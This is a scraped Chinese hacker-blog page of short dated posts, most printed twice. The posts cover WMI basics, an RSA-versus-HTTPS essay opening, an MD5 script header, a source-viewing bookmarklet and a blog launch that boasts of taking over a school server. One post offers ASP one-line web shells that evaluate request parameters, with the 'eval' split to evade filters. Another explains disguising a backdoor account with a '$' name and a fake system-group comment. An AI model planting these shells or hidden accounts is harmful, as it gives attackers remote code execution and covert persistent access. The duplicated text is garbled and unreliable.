Oct
4
来源:阿D
一:WMI基础知识
WMI 最初于1998年作为一个附加组件与 Windows NT 4.0 Service Pack 4 一起发行,是内置在Windows 2000、 Windows XP和Windows Server 2003 系列操作系统中核心的管理支持技术。基于由 Distributed Management Task Force (DMTF) 所监督的业界标准,WMI是一种规范和基础结构,通过它可以访问、配置、管理和监视几乎所有的Windows资源。大多用户习惯于使用众多的图形化管理工具来管理Windows资源,在WMI之前这些工具都是通过 Win32应用程序编程接口(Application ProgrammingInterfaces,API)来访问和管理Windows资源的。只要你熟悉系统编程你就知道API有多么重要。但是大多数脚本语言都不能直接调用Win32 API,WMI的出现使得系统管理员可以通过一种简便的方法即利用常见的脚本语言实现常用的系统管理任务。
利用WMI需要和脚本如WSH和VBScript结合起来,可以实现的功能大家可以看微软的MSDN文档。
一:WMI基础知识
WMI 最初于1998年作为一个附加组件与 Windows NT 4.0 Service Pack 4 一起发行,是内置在Windows 2000、 Windows XP和Windows Server 2003 系列操作系统中核心的管理支持技术。基于由 Distributed Management Task Force (DMTF) 所监督的业界标准,WMI是一种规范和基础结构,通过它可以访问、配置、管理和监视几乎所有的Windows资源。大多用户习惯于使用众多的图形化管理工具来管理Windows资源,在WMI之前这些工具都是通过 Win32应用程序编程接口(Application ProgrammingInterfaces,API)来访问和管理Windows资源的。只要你熟悉系统编程你就知道API有多么重要。但是大多数脚本语言都不能直接调用Win32 API,WMI的出现使得系统管理员可以通过一种简便的方法即利用常见的脚本语言实现常用的系统管理任务。
利用WMI需要和脚本如WSH和VBScript结合起来,可以实现的功能大家可以看微软的MSDN文档。
Oct
4
来源:啊D
<%ExecuteGlobal request("1")%>
<%
set sobiny = server.CreateObject("MSScriptControl.ScriptControl.1")
sobiny.Language="VBScript"
sobiny.AddObject "Response", Response
sobiny.AddObject "request", request
sobiny.ExecuteStatement("ev"&"al(request(""aaaa""))")
%>
网上有人用这些方法,所以我抄下来!
<%ExecuteGlobal request("1")%>
<%
set sobiny = server.CreateObject("MSScriptControl.ScriptControl.1")
sobiny.Language="VBScript"
sobiny.AddObject "Response", Response
sobiny.AddObject "request", request
sobiny.ExecuteStatement("ev"&"al(request(""aaaa""))")
%>
网上有人用这些方法,所以我抄下来!
Oct
3
Oct
2
Author:云舒
Team:Ph4nt0m
可以随意转载,但是必须保留ph4nt0m的版权所有,谢绝商业用途。
前些时候,大概7月份看了些SSL协议的东西,对前人非常的佩服。把非对称加密的安全性和对称加密的快速性结合起来使用,保留了各自的长处。整个数据传输过程中,通过非对称加密在不安全的区域安全的传输了用于对称加密的密钥,实在是创造性的思维。
前天晚上洗澡的时候,突然有了几个新的想法,加上以前的一点发现,就有了这篇文章和几行代码。现在觉得非对称加密还真的很有意思啊,洗澡也很有意思,难怪阿基米德洗澡能够发现浮力定理。我们不够强大,可能是因为洗澡不够吧。
一. RSA替换HTTPS保证安全传输敏感数据
目前大多数的web应用在注册或者登录的时候,或者其他任何涉及到用户帐户,密码,以及信用卡号等等敏感数据传输的时候,一般都毫不犹豫的采用了 HTTPS加密传输的方式来进行。比如Gmail,Yahoo Mail,Live Mail等国际性的邮箱,都是用了这种方式。确实,使用HTTPS是一种比较安全的方法,但是这样做从成本角度来说,并不是最优的。
使用 1024位密钥的HTTPS传输,在相同硬件配置的情况下,性能基本上要损失掉30%左右。大量的CPU时间花费到了对数据的加密解密以及证书认证,传输,SSL握手等方面。对于千万用户级别的应用这些损失是难以忽略掉的,因此大公司一般都会购买SSL硬件加密卡,使用硬件进行加密解密。
Team:Ph4nt0m
可以随意转载,但是必须保留ph4nt0m的版权所有,谢绝商业用途。
前些时候,大概7月份看了些SSL协议的东西,对前人非常的佩服。把非对称加密的安全性和对称加密的快速性结合起来使用,保留了各自的长处。整个数据传输过程中,通过非对称加密在不安全的区域安全的传输了用于对称加密的密钥,实在是创造性的思维。
前天晚上洗澡的时候,突然有了几个新的想法,加上以前的一点发现,就有了这篇文章和几行代码。现在觉得非对称加密还真的很有意思啊,洗澡也很有意思,难怪阿基米德洗澡能够发现浮力定理。我们不够强大,可能是因为洗澡不够吧。
一. RSA替换HTTPS保证安全传输敏感数据
目前大多数的web应用在注册或者登录的时候,或者其他任何涉及到用户帐户,密码,以及信用卡号等等敏感数据传输的时候,一般都毫不犹豫的采用了 HTTPS加密传输的方式来进行。比如Gmail,Yahoo Mail,Live Mail等国际性的邮箱,都是用了这种方式。确实,使用HTTPS是一种比较安全的方法,但是这样做从成本角度来说,并不是最优的。
使用 1024位密钥的HTTPS传输,在相同硬件配置的情况下,性能基本上要损失掉30%左右。大量的CPU时间花费到了对数据的加密解密以及证书认证,传输,SSL握手等方面。对于千万用户级别的应用这些损失是难以忽略掉的,因此大公司一般都会购买SSL硬件加密卡,使用硬件进行加密解密。
Oct
1
源于:前天好像是压力测试问我如果给建立的用户加上注释的同时能够加上空格。
什么是注释呢:
看到了吧,如果我们建立一个用户,加上一些像HelpServicesGroup 或者是 Network Configuration Operators 这样的注释,再把用户名建立的“个性”一点,再加上一个$符号的话,当他用net user 用户名 查看用户时一看是系统组的,或者是一些其他组的,这样他是不是就不会怀疑了!对,这样我们就可以达到欺骗的功能!
看命令:
复制内容到剪贴板
代码:
看效果图:
什么是注释呢:
看到了吧,如果我们建立一个用户,加上一些像HelpServicesGroup 或者是 Network Configuration Operators 这样的注释,再把用户名建立的“个性”一点,再加上一个$符号的话,当他用net user 用户名 查看用户时一看是系统组的,或者是一些其他组的,这样他是不是就不会怀疑了!对,这样我们就可以达到欺骗的功能!
看命令:
复制内容到剪贴板
代码:
net user 用户名 密码 /comment:"注释" /add
看效果图:
Oct
1
<script>
/*
* A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 2.1 Copyright (C) Paul Johnston 1999 - 2002.
* Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet
* Distributed under the BSD License
* See http://pajhome.org.uk/crypt/md5 for more info.
*/
/*
* Configurable variables. You may need to tweak these to be compatible with
* the server-side, but the defaults work in most cases.
*/
var hexcase = 0; /* hex output format. 0 - lowercase; 1 - uppercase */
var b64pad = ""; /* base-64 pad character. "=" for strict RFC compliance */
var chrsz = 8; /* bits per input character. 8 - ASCII; 16 - Unicode */
/*
* A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 2.1 Copyright (C) Paul Johnston 1999 - 2002.
* Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet
* Distributed under the BSD License
* See http://pajhome.org.uk/crypt/md5 for more info.
*/
/*
* Configurable variables. You may need to tweak these to be compatible with
* the server-side, but the defaults work in most cases.
*/
var hexcase = 0; /* hex output format. 0 - lowercase; 1 - uppercase */
var b64pad = ""; /* base-64 pad character. "=" for strict RFC compliance */
var chrsz = 8; /* bits per input character. 8 - ASCII; 16 - Unicode */
Oct
1
今天可是一个好天气,阳光明媚,空气清新!更重要的是今天是国庆节!
不对,外面还下着小雨呢!
我宣布:偶的新站现在成立!大家欢迎!!(`````````掌声````````)
第一项:我讲话:
从一开始到现在,我要感谢很多人:
第一,我要感谢我的父母,感谢他们的养育之恩。
第二,感谢我所有的亲人。
第三,感谢我所有的朋友。
第四,感谢鬼仔:http://www.huaidan.org 在他的帮助下我有了第一个blog,而在其他方面他对我的帮助很大!真的很谢谢他!
第五,感谢冰剑:http://www.is28.cn 在他的帮助下我有了现在这个blog,我觉得不光是关于论坛上的关系,而更重要的是因为朋友关系,我觉得我们现在是真的朋友了!
第六,感谢伤脑筋,在他的帮助下我成功拿下学校一台服务器,虽然现在还没拿到主服务器,不过我觉得也不错了。非常感谢他。
第七,感谢非常批处理论坛:http://www.verybat.cn 是它让我学到了很多东西,不光是bat ,更多的是如何更好的生活。
第七,感谢。。。。。。很多很多!!
第二项:blog建立成功,完毕!
不对,外面还下着小雨呢!
我宣布:偶的新站现在成立!大家欢迎!!(`````````掌声````````)
第一项:我讲话:
从一开始到现在,我要感谢很多人:
第一,我要感谢我的父母,感谢他们的养育之恩。
第二,感谢我所有的亲人。
第三,感谢我所有的朋友。
第四,感谢鬼仔:http://www.huaidan.org 在他的帮助下我有了第一个blog,而在其他方面他对我的帮助很大!真的很谢谢他!
第五,感谢冰剑:http://www.is28.cn 在他的帮助下我有了现在这个blog,我觉得不光是关于论坛上的关系,而更重要的是因为朋友关系,我觉得我们现在是真的朋友了!
第六,感谢伤脑筋,在他的帮助下我成功拿下学校一台服务器,虽然现在还没拿到主服务器,不过我觉得也不错了。非常感谢他。
第七,感谢非常批处理论坛:http://www.verybat.cn 是它让我学到了很多东西,不光是bat ,更多的是如何更好的生活。
第七,感谢。。。。。。很多很多!!
第二项:blog建立成功,完毕!
Sep
30
在地址栏或按Ctrl+O,输入:
javascript:k=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=k;
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
javascript:k=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=k;
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
